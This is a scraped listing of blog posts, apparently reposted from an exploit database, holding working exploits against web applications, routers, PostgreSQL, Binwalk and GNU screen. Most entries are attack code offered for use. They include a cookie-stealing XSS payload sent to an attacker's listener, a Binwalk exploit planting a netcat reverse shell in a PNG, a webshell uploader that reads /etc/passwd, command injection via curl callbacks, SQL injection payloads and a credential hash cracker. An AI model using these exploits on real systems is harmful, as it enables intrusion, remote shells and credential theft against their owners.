    # Exploit Title: Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS) # Date: 2021-09-17 # Exploit Author: Matteo Conti - https://deltaspike.io # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip # Version: 1.0 # Tested on: Ubuntu 18.04 - LAMP # Description The application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message, maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it. # Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message) # Tested Payload: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie> # Prof of concept: - From /contact.php, send a message containing the following payload in "title" or "message" fields: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie> (the first url have to be an existing image) - Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php - Your listener will receive the PHP session id.
  12. HireHackking

    Liferay Portal 6.2.5 - Insecure Permissions

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions # Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/ # Date: 2021/05 # Exploit Author: fu2x2000 # Version: Liferay Portal 6.2.5 or later # CVE : CVE-2021-33990 import requests import json print (" Search this on Google #Dork for liferay -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/") url ="URL Goes Here /html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html" req = requests.get(url) print req sta = req.status_code if sta == 200: print ('Life Vulnerability exists') cook = url print cook inject = "Command=FileUpload&Type=File&CurrentFolder=/" #cook_inject = cook+inject #print cook_inject else: print ('not found try a another method') print ("solution restrict access and user groups")
  13. HireHackking

    D-Link DIR-846 - Remote Command Execution (RCE) vulnerability

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability # Google Dork: NA # Date: 30/01/2023 # Exploit Author: Françoa Taffarel # Vendor Homepage: https://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip # Software Link: https://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip # Version: DIR846enFW100A53DBR-Retail # Tested on: D-LINK DIR-846 # CVE : CVE-2022-46552 D-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote command execution (RCE) vulnerability via the lan(0)_dhcps_staticlist parameter. This vulnerability is exploited via a crafted POST request. ### Malicious POST Request ``` POST /HNAP1/ HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json SOAPACTION: "http://purenetworks.com/HNAP1/SetIpMacBindSettings" HNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285 Content-Length: 171 Origin: http://192.168.0.1 Connection: close Referer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775 Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7; PrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4 {"SetIpMacBindSettings":{"lan_unit":"0","lan(0)_dhcps_staticlist":"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15"}} ``` ### Response ``` HTTP/1.1 200 OK X-Powered-By: PHP/7.1.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-type: text/html; charset=UTF-8 Connection: close Date: Thu, 01 Dec 2022 11:03:54 GMT Server: lighttpd/1.4.35 Content-Length: 68 {"SetIpMacBindSettingsResponse":{"SetIpMacBindSettingsResult":"OK"}} ``` ### Data from RCE Request ``` GET /HNAP1/rce_confirmed HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV; PrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1 Upgrade-Insecure-Requests: 1 ``` ### Response ``` HTTP/1.1 200 OK Content-Type: application/octet-stream Accept-Ranges: bytes Content-Length: 24 Connection: close Date: Thu, 01 Dec 2022 23:24:28 GMT Server: lighttpd/1.4.35 uid=0(root) gid=0(root) ```
  14. HireHackking

    Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated) # Date: 2023-01-02 # Exploit Author: Muhammad Navaid Zafar Ansari # Vendor Homepage: https://www.sourcecodester.com/php/16089/online-eyewear-shop-website-using-php-and-mysql-free-download.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-oews.zip # Version: 1.0 # Tested on: Kali Linux + PHP 8.2.1, Apache 2.4.55 (Debian) # CVE: Not Assigned Yet # References: - ------------------------------------------------------------------------------------ 1. Description: ---------------------- Online Eyewear Shop 1.0 allows Unauthenticated SQL Injection via parameter 'id' in 'oews/?p=products/view_product&id=?' Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- Step 1 - By visiting the url: http://localhost/oews/?p=products/view_product&id=5 just add single quote to verify the SQL Injection. Step 2 - Run sqlmap -u "http://localhost/oews/?p=products/view_product&id=3" -p id --dbms=mysql SQLMap Response: [*] starting @ 04:49:58 /2023-02-01/ [04:49:58] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ft4vh3vs87t...s4nu5kh7ik'). Do you want to use those [Y/n] n sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=products/view_product&id=3' AND 4759=4759 AND 'oKly'='oKly Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: p=products/view_product&id=3' AND (SELECT 5509 FROM (SELECT(SLEEP(5)))KaYM) AND 'phDK'='phDK --- [04:50:00] [INFO] testing MySQL [04:50:00] [INFO] confirming MySQL [04:50:00] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian web application technology: Apache 2.4.55, PHP back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) 3. Example payload: ---------------------- (boolean-based) ' AND 1=1 AND 'test'='test 4. Burpsuite request: ---------------------- GET /oews/?p=products/view_product&id=5%27+and+0+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,version(),14--+- HTTP/1.1 Host: localhost sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g491mrrn2ntmqa9akheqr3ujip Connection: close
  15. HireHackking

    bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    ## Title: bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS) ## Author: nu11secur1ty ## Date: 01.31.2023 ## Vendor: https://bgerp.com/Bg/Za-sistemata ## Software: https://github.com/bgerp/bgerp/releases/tag/v22.31 ## Reference: https://portswigger.net/kb/issues/00500b01_cookie-manipulation-reflected-dom-based ## Description: The bgERP system suffers from unsecured login cookies in which cookies are stored as very sensitive login and also login session information! The attacker can trick the already login user and can steal the already generated cookie from the system and can do VERY DANGEROUS things with the already stored sensitive information. This can be very expensive for all companies which are using this system, please be careful! Also, this system has a vulnerable search parameter for XSS-Reflected attacks! ## STATUS: HIGH Vulnerability [+] Exploit: ```GET GET /Portal/Show?recentlySearch_14=%3c%61%20%68%72%65%66%3d%22%68%74%74%70%73%3a%2f%2f%70%6f%72%6e%68%75%62%2e%63%6f%6d%2f%22%20%74%61%72%67%65%74%3d%22%5f%62%6c%61%6e%6b%22%20%72%65%6c%3d%22%6e%6f%6f%70%65%6e%65%72%20%6e%6f%66%6f%6c%6c%6f%77%20%75%67%63%22%3e%0a%3c%69%6d%67%20%73%72%63%3d%22%68%74%74%70%73%3a%2f%2f%64%6c%2e%70%68%6e%63%64%6e%2e%63%6f%6d%2f%67%69%66%2f%34%31%31%36%35%37%36%31%2e%67%69%66%3f%3f%74%6f%6b%65%6e%3d%47%48%53%41%54%30%41%41%41%41%41%41%42%58%57%47%53%4b%4f%48%37%4d%42%46%4c%45%4b%46%34%4d%36%59%33%59%43%59%59%4b%41%44%54%51%26%72%73%3d%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%31%70%78%20%73%6f%6c%69%64%20%62%6c%61%63%6b%3b%6d%61%78%2d%77%69%64%74%68%3a%31%30%30%25%3b%22%20%61%6c%74%3d%22%50%68%6f%74%6f%20%6f%66%20%42%79%72%6f%6e%20%42%61%79%2c%20%6f%6e%65%20%6f%66%20%41%75%73%74%72%61%6c%69%61%27%73%20%62%65%73%74%20%62%65%61%63%68%65%73%21%22%3e%0a%3c%2f%61%3e&Cmd%5Bdefault%5D=1 HTTP/1.1 Host: 192.168.100.77:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.100.77:8080/Portal/Show Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: SID=rfn0jpm60epeabc1jcrkhgr9c3; brid=MC9tQnJQ_438f57; menuInfo=1254:l :0 Connection: close Content-Length: 0 ``` [+] Response after logout of the system: ```HTTP HTTP/1.1 302 Found Date: Tue, 31 Jan 2023 15:13:26 GMT Server: Apache/2.4.41 (Ubuntu) Expires: 0 Cache-Control: no-cache, must-revalidate Location: /core_Users/login/?ret_url=bgerp%2FPortal%2FShow%2FrecentlySearch_14%2F%253Ca%2Bhref%253D%2522https%253A%252F%252Fpornhub.com%252F%2522%2Btarget%253D%2522_blank%2522%2Brel%253D%2522noopener%2Bnofollow%2Bugc%2522%253E%250A%253Cimg%2Bsrc%253D%2522https%253A%252F%252Fdl.phncdn.com%252Fgif%252F41165761.gif%253F%253Ftoken%253DGHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ%2526rs%253D1%2522%2Bstyle%253D%2522border%253A1px%2Bsolid%2Bblack%253Bmax-width%253A100%2525%253B%2522%2Balt%253D%2522Photo%2Bof%2BByron%2BBay%252C%2Bone%2Bof%2BAustralia%2527s%2Bbest%2Bbeaches%2521%2522%253E%250A%253C%252Fa%253E%2FCmd%2Cdefault%2F1%2FCmd%2Crefresh%2F1_48f6f472 Connection: close Content-Length: 2 Content-Encoding: none Content-Type: text/html; charset=UTF-8 OK ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/bgERP/2023/brERP-v22.31-Cookie-Session-vulnerability%2BXSS-Reflected) ## Proof and Exploit: [href](https://streamable.com/xhffdu) ## Time spent `01:30:00` -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  16. HireHackking

    Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dell EMC Networking PC5500 firmware versions 4.1.0.22 and Cisco Sx / SMB - Information Disclosure # DSA-2020-042: Dell Networking Security Update for an Information Disclosure Vulnerability | Dell US<https://www.dell.com/support/kbdoc/en-us/000133476/dsa-2020-042-dell-networking-security-update-for-an-information-disclosure-vulnerability> https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200129-smlbus-switch-disclos # CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter # Discovered by Ken 's1ngular1ty' Pyle # CVE-2019-15993 / CVE-2020-5330 - Cisco Sx / SMB, Dell X & VRTX, Netgear (Various) Information Disclosure and Hash Decrypter # Discovered by Ken 's1ngular1ty' Pyle import requests import re import hashlib import sys from requests.packages.urllib3.exceptions import InsecureRequestWarning if len(sys.argv) < 3: print("Usage: python cve-2019-15993.py URL passwordfile") sys.exit() url = sys.argv[1] file = sys.argv[2] requests.packages.urllib3.disable_warnings(InsecureRequestWarning) def hash_value(value): """Calculate the SHA1 hash of a value.""" sha1 = hashlib.sha1() sha1.update(value.encode('utf-8')) return sha1.hexdigest() def userName_parser(text, start_delimiter, end_delimiter): results = [] iteration = 0 start = 0 while start >= 0: start = text.find(start_delimiter, start) if start >= 0: start += len(start_delimiter) end = text.find(end_delimiter, start) if end >= 0: results.append(text[start:end]) start = end + len(end_delimiter) iteration = iteration + 1 return results # retrieve the web page response = requests.get(url, allow_redirects=False, verify=False) # Read in the values from the file with open(file, 'r') as f: values = f.readlines() values = [value.strip() for value in values] hashes = {hash_value(value): value for value in values} if response.status_code == 302: print("Cisco / Netgear / Netgear Hash Disclosure - Retrieving API Path & ID / MAC Address via 302 carving.\n") url = response.headers["Location"] + "config/device/adminusersetting" response=requests.get(url, verify=False) if response.status_code == 200: print("[*] Successful request to URL:", url + "\n") content = response.text users_names = userName_parser(content,"<userName>","</userName>") sha1_hashes = re.findall(r"[a-fA-F\d]{40}", content) print("SHA1 Hashes found:\n") loops = 0 while loops < len(sha1_hashes): print("Username: " + str(users_names[loops]) + "\n" + "SHA1 Hash: " + sha1_hashes[loops] + "\n") for sha1_hash in sha1_hashes: if sha1_hash in hashes: print("Match:", sha1_hash, hashes[sha1_hash]) print("\nTesting Credentials via API.\n\n") payload = (sys.argv[1] + "/System.xml?" + "action=login&" + "user=" + users_names[loops] + "&password=" + hashes[sha1_hash]) response_login = requests.get(payload, allow_redirects=False, verify=False) headers = response_login.headers if "sessionID" in headers: print("Username & Password for " + str(users_names[loops]) + " is correct.\n\nThe SessionID Token / Cookie is:\n") print(headers["sessionID"]) else: print("Unable to sign in.") loops = loops + 1 else: print("Host is not vulnerable:", response.status_code) [cid:2b37ad37-9b26-416d-b485-c88954c0ab53] Ken Pyle M.S. IA, CISSP, HCISPP, ECSA, CEH, OSCP, OSWP, EnCE, Sec+ Main: 267-540-3337 Direct: 484-498-8340 Email: kp@cybir.com Website: www.cybir.com
  17. HireHackking

    PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated) # Date: 2023-02-01 # Exploit Author: Paulo Trindade (@paulotrindadec), Bruno Stabelini (@Bruno Stabelini), Diego Farias (@fulcrum) and Weslley Shaimon # Github: https://github.com/paulotrindadec/CVE-2019-9193 # Version: PostgreSQL 9.6.1 on x86_64-pc-linux-gnu # Tested on: Red Hat Enterprise Linux Server 7.9 # CVE: CVE-2019–9193 #!/usr/bin/python3 import sys import psycopg2 import argparse def parseArgs(): parser = argparse.ArgumentParser(description='PostgreSQL 9.6.1 Authenticated Remote Code Execution') parser.add_argument('-i', '--ip', nargs='?', type=str, default='127.0.0.1', help='The IP address of the PostgreSQL DB [Default: 127.0.0.1]') parser.add_argument('-p', '--port', nargs='?', type=int, default=5432, help='The port of the PostgreSQL DB [Default: 5432]') parser.add_argument('-U', '--user', nargs='?', default='postgres', help='Username to connect to the PostgreSQL DB [Default: postgres]') parser.add_argument('-P', '--password', nargs='?', default='postgres', help='Password to connect to the the PostgreSQL DB [Default: postgres]') parser.add_argument('-c', '--command', nargs='?', help='System command to run') args = parser.parse_args() return args def main(): try: # Variables RHOST = args.ip RPORT = args.port USER = args.user PASS = args.password print(f"\r\n[+] Connect to PostgreSQL - {RHOST}") con = psycopg2.connect(host=RHOST, port=RPORT, user=USER, password=PASS) if (args.command): exploit(con) else: print ("[!] Add argument -c [COMMAND] to execute system commands") except psycopg2.OperationalError as e: print("Error") print ("\r\n[-] Failed to connect with PostgreSQL") exit() def exploit(con): cur = con.cursor() CMD = args.command try: print('[*] Running\n') cur.execute("DROP TABLE IF EXISTS triggeroffsec;") cur.execute("DROP FUNCTION triggeroffsecexeccmd() cascade;") cur.execute("DROP TABLE IF EXISTS triggeroffsecsource;") cur.execute("DROP TRIGGER IF EXISTS shoottriggeroffsecexeccmd on triggeroffsecsource;") cur.execute("CREATE TABLE triggeroffsec (id serial PRIMARY KEY, cmdout text);") cur.execute("""CREATE OR REPLACE FUNCTION triggeroffsecexeccmd() RETURNS TRIGGER LANGUAGE plpgsql AS $BODY$ BEGIN COPY triggeroffsec (cmdout) FROM PROGRAM %s; RETURN NULL; END; $BODY$; """,[CMD,] ) cur.execute("CREATE TABLE triggeroffsecsource(s_id integer PRIMARY KEY);") cur.execute("""CREATE TRIGGER shoottriggeroffsecexeccmd AFTER INSERT ON triggeroffsecsource FOR EACH STATEMENT EXECUTE PROCEDURE triggeroffsecexeccmd(); """) cur.execute("INSERT INTO triggeroffsecsource VALUES (2);") cur.execute("TABLE triggeroffsec;") con.commit() returncmd = cur.fetchall() for result in returncmd: print(result) except (Exception, psycopg2.DatabaseError) as error: print(error) finally: if con is not None: con.close() #print("Closed connection") if __name__ == "__main__": args = parseArgs() main()
  18. HireHackking

    Binwalk v2.3.2 - Remote Command Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Binwalk v2.3.2 - Remote Command Execution (RCE) # Exploit Author: Etienne Lacoche # CVE-ID: CVE-2022-4510 import os import inspect import argparse print("") print("################################################") print("------------------CVE-2022-4510----------------") print("################################################") print("--------Binwalk Remote Command Execution--------") print("------Binwalk 2.1.2b through 2.3.2 included-----") print("------------------------------------------------") print("################################################") print("----------Exploit by: Etienne Lacoche-----------") print("---------Contact Twitter: @electr0sm0g----------") print("------------------Discovered by:----------------") print("---------Q. Kaiser, ONEKEY Research Lab---------") print("---------Exploit tested on debian 11------------") print("################################################") print("") parser = argparse.ArgumentParser() parser.add_argument("file", help="Path to input .png file",default=1) parser.add_argument("ip", help="Ip to nc listener",default=1) parser.add_argument("port", help="Port to nc listener",default=1) args = parser.parse_args() if args.file and args.ip and args.port: header_pfs = bytes.fromhex("5046532f302e390000000000000001002e2e2f2e2e2f2e2e2f2e636f6e6669672f62696e77616c6b2f706c7567696e732f62696e77616c6b2e70790000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000034120000a0000000c100002e") lines = ['import binwalk.core.plugin\n','import os\n', 'import shutil\n','class MaliciousExtractor(binwalk.core.plugin.Plugin):\n',' def init(self):\n',' if not os.path.exists("/tmp/.binwalk"):\n',' os.system("nc ',str(args.ip)+' ',str(args.port)+' ','-e /bin/bash 2>/dev/null &")\n',' with open("/tmp/.binwalk", "w") as f:\n',' f.write("1")\n',' else:\n',' os.remove("/tmp/.binwalk")\n', ' os.remove(os.path.abspath(__file__))\n',' shutil.rmtree(os.path.join(os.path.dirname(os.path.abspath(__file__)), "__pycache__"))\n'] in_file = open(args.file, "rb") data = in_file.read() in_file.close() with open("/tmp/plugin", "w") as f: for line in lines: f.write(line) with open("/tmp/plugin", "rb") as f: content = f.read() os.system("rm /tmp/plugin") with open("binwalk_exploit.png", "wb") as f: f.write(data) f.write(header_pfs) f.write(content) print("") print("You can now rename and share binwalk_exploit and start your local netcat listener.") print("")
  19. HireHackking

    Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    // Exploit Title: Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE) // Date: 2023-02-02 // Exploit Author: Mayank Deshmukh // Vendor Homepage: https://centos-webpanel.com/ // Affected Versions: version < 0.9.8.1147 // Tested on: Kali Linux // CVE : CVE-2022-44877 // Github POC: https://github.com/ColdFusionX/CVE-2022-44877-CWP7 // Exploit Usage : go run exploit.go -u https://127.0.0.1:2030 -i 127.0.0.1:8020 package main import ( "bytes" "crypto/tls" "fmt" "net/http" "flag" "time" ) func main() { var host,call string flag.StringVar(&host, "u", "", "Control Web Panel (CWP) URL (ex. https://127.0.0.1:2030)") flag.StringVar(&call, "i", "", "Listener IP:PORT (ex. 127.0.0.1:8020)") flag.Parse() banner := ` -= Control Web Panel 7 (CWP7) Remote Code Execution (RCE) (CVE-2022-44877) =- - by Mayank Deshmukh (ColdFusionX) ` fmt.Printf(banner) fmt.Println("[*] Triggering cURL command") fmt.Println("[*] Open Listener on " + call + "") //Skip certificate validation tr := &http.Transport{ TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, } client := &http.Client{Transport: tr} // Request URL url := host + "/login/index.php?login=$(curl${IFS}" + call + ")" // Request body body := bytes.NewBuffer([]byte("username=root&password=cfx&commit=Login")) // Create HTTP client and send POST request req, err := http.NewRequest("POST", url, body) req.Header.Add("Content-Type", "application/x-www-form-urlencoded") resp, err := client.Do(req) if err != nil { fmt.Println("Error sending request:", err) return } time.Sleep(2 * time.Second) defer resp.Body.Close() fmt.Println("\n[*] Check Listener for OOB callback") }
  20. HireHackking

    Responsive FileManager 9.9.5 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Responsive FileManager 9.9.5 - Remote Code Execution (RCE) # Date: 02-Feb-2023 # Exploit Author: Galoget Latorre (@galoget) # Vendor Homepage: https://responsivefilemanager.com # Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.9.5/responsive_filemanager.zip # Dockerfile: https://github.com/galoget/ResponsiveFileManager-CVE-2022-46604 # Version: 9.9.5 # Language: Python 3.x # Tested on: # - Ubuntu 22.04.5 LTS 64-bit # - Debian GNU/Linux 10 (buster) 64-bit # - Kali GNU/Linux 2022.3 64-bit # CVE: CVE-2022-46604 (Konstantin Burov) #!/usr/bin/python3 # -*- coding:utf-8 -*- import sys import requests from bs4 import BeautifulSoup from termcolor import colored, cprint # Usage: python3 exploit.py <target.site> # Example: python3 exploit.py 127.0.0.1 def banner(): """ Function to print the banner """ banner_text = """ _____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___ | | | | __| ___ |_ | |_ |_ | ___ | | | _| _| | | | | --| | | __| |___| | _| | | _| _| |___| |_ | . | . | | |_ | |_____|\\___/|_____| |___|___|___|___| |_|___|___|___| |_| File Creation Extension Bypass in Responsive FileManager ≤ 9.9.5 (RCE) Exploit Author: Galoget Latorre (@galoget) CVE Author: Konstantin Burov """ print(banner_text) def usage_instructions(): """ Function that validates the number of arguments. The aplication MUST have 2 arguments: - [0]: Name of the script - [1]: Target site, which can be a domain or an IP Address """ if len(sys.argv) != 2: print("Usage: python3 exploit.py <target.site>") print("Example: python3 exploit.py 127.0.0.1") sys.exit(0) def run_command(web_session, webshell_url, command_to_run): """ Function that: - Interacts with the webshell to run a command - Cleans the response of the webshell - Returns the response object and the output of the command """ webshell_response = web_session.get(url = webshell_url + f"?cmd={command_to_run}", headers = headers) command_output_soup = BeautifulSoup(webshell_response.text, 'html.parser') return (webshell_response, command_output_soup.find('pre').text) if __name__ == "__main__": banner() usage_instructions() # Change this with the domain or IP address to attack if sys.argv[1]: host = sys.argv[1] else: host = "127.0.0.1" headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', } # URL to create a new file target_url = f"http://{host}/filemanager/execute.php?action=create_file" # Change this to customize the payload (i.e. The content of the malicious file that will be created) payload = "<html><body><form method=\"GET\" name=\"<?php echo basename($_SERVER['PHP_SELF']); ?>\"><input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\"><input type=\"SUBMIT\" value=\"Execute\"></form><pre><?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?></pre></body></html>" # oneliner_payload = " <?=`$_GET[_]`?>" # URL to get a PHPSESSID value cookie_url = f"http://{host}/filemanager/dialog.php" # New Session session = requests.Session() # GET request to retrieve a PHPSESSID value cprint(f"[*] Trying to get a PHPSESSID at {host}", "blue") try: session.get(url = cookie_url, headers = headers) except: cprint(f"[-] Something went wrong when trying to connect to '{host}'.", "red") sys.exit(0) if session.cookies.get_dict(): cprint("[+] PHPSESSID retrieved correctly.", "green") cprint(f"[!] PHPSESSID: {session.cookies.get_dict()['PHPSESSID']}", "yellow") else: cprint("[-] Something went wrong when trying to get a PHPSESSID.", "red") # Params, rename if you want params = {"path": "shell.php", "path_thumb": "../thumbs/shell.php", "name": "shell.txt", "new_content": payload} # POST request to create the webshell cprint(f"\n[*] Attempting to create a webshell on {host}", "blue") response = session.post(url = target_url, headers = headers, data = params) # If the status code and the message match, we may have a webshell inside. ;) if response.status_code == 200 and response.text == "File successfully saved.": # Default webshell path shell_url = f"http://{host}/source/shell.php" # Verify if the shell was uploaded by running whoami and cat /etc/passwd webshell, whoami_output = run_command(session, shell_url, "whoami") webshell, passwd_output = run_command(session, shell_url, "cat /etc/passwd") # Common users when getting a webshell common_users = ["www-data", "apache", "nobody", "apache2", "root", "administrator", "admin"] # Verify if the command was executed correctly if webshell.status_code == 200 or whoami_output.lower() in common_users or "root:x::" in passwd_output: cprint("[+] Webshell uploaded - Enjoy!", "green") cprint(f"[!] Webshell available at '{shell_url}' - Enjoy!", "yellow") cprint(f"[+] Running `whoami` command: {whoami_output}", "green") # Ask to enter into a pseudo-interactive mode with the webshell answer = input(colored("Do you want to enter into interactive mode with the webshell? (Y/N): ", "magenta")) if answer.upper() == "Y": cprint("\n[*] Entering into interactive mode, write 'exit' to quit.\n", "blue") command = "" while command != "exit": command = input(colored(">> ", "cyan")).lower() webshell, command_output = run_command(session, shell_url, command) if command != "exit": cprint(command_output, "cyan") cprint("\n[*] Exiting...Bye!", "blue") elif response.status_code == 403 and response.text == "The file is already existing": cprint("[-] The file that you're trying to create is already on the server.", "red") else: cprint(f"[-] The server returned Status Code: '{response.status_code}' and this text: '{response.text}'", "red")
  21. HireHackking

    itech TrainSmart r1044 - SQL injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: itech TrainSmart r1044 - SQL injection # Date: 03.02.2023 # Exploit Author: Adrian Bondocea # Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/ # Version: TrainSmart r1044 # Tested on: Linux # CVE : CVE-2021-36520 SQL injection vulnerability in itech TrainSmart r1044 allows remote attackers to view sensitive information via crafted command using sqlmap. PoC: sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs
  22. HireHackking

    GNU screen v4.9.0 - Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: GNU screen v4.9.0 - Privilege Escalation # Date: 03.02.2023 # Exploit Author: Manuel Andreas # Vendor Homepage: https://www.gnu.org/software/screen/ # Software Link: https://ftp.gnu.org/gnu/screen/screen-4.9.0.tar.gz # Version: 4.9.0 # Tested on: Arch Linux # CVE : CVE-2023-24626 import os import socket import struct import argparse import subprocess import pty import time SOCKDIR_TEMPLATE = "/run/screens/S-{}" MAXPATHLEN = 4096 MAXTERMLEN = 32 MAXLOGINLEN = 256 STRUCTSIZE = 12584 MSG_QUERY = 9 def find_latest_socket(dir): return f"{dir}/{sorted(os.listdir(dir))[-1]}" def build_magic(ver=5): return ord('m') << 24 | ord('s') << 16 | ord('g') << 8 | ver def build_msg(type): return struct.pack("<ii", build_magic(), type) + MAXPATHLEN * b"T" def build_query(auser, nargs, cmd, apid, preselect, writeback): assert(len(auser) == MAXLOGINLEN + 1) assert(len(cmd) == MAXPATHLEN) assert(len(preselect) == 20) assert(len(writeback) == MAXPATHLEN) buf = build_msg(MSG_QUERY) buf += auser buf += 3 * b"\x00" #Padding buf += struct.pack("<i", nargs) buf += cmd buf += struct.pack("<i", apid) buf += preselect buf += writeback # Union padding buf += (STRUCTSIZE - len(buf)) * b"P" return buf def spawn_screen_instance(): # provide a pty mo, so = pty.openpty() me, se = pty.openpty() mi, si = pty.openpty() screen = subprocess.Popen("/usr/bin/screen", bufsize=0, stdin=si, stdout=so, stderr=se, close_fds=True, env={"TERM":"xterm"}) for fd in [so, se, si]: os.close(fd) return screen def main(): parser = argparse.ArgumentParser(description='PoC for sending SIGHUP as root utilizing GNU screen configured as setuid root.') 